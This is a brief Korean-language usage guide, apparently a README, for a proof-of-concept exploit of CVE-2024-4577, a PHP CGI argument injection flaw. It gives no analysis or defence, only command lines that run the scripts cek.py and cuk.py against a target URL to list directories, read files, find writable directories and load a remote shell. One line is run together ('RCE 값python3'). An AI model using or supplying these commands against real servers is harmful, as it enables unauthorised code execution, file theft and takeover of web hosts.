
CVE-2024-4577에 대한 개념 증명 익스플로잇으로, PHP CGI 인자 주입 취약점을 이용하여 취약한 대상에서 원격 코드 실행 및 셸 접근을 가능하게 합니다.
RCE 값python3 cek.py --target http://target/index.php --ls --dir /path/to/directory
python3 cek.py --target https://target/index.php --dir /path/to/directory
python3 cek.py --target https://target/index.php --cat /path/to/directory
쓰기 가능한 디렉터리 찾기
python3 cek.py --target https://target/index.php --find
쉘 로드
python3 cuk.py --target https://target/index.php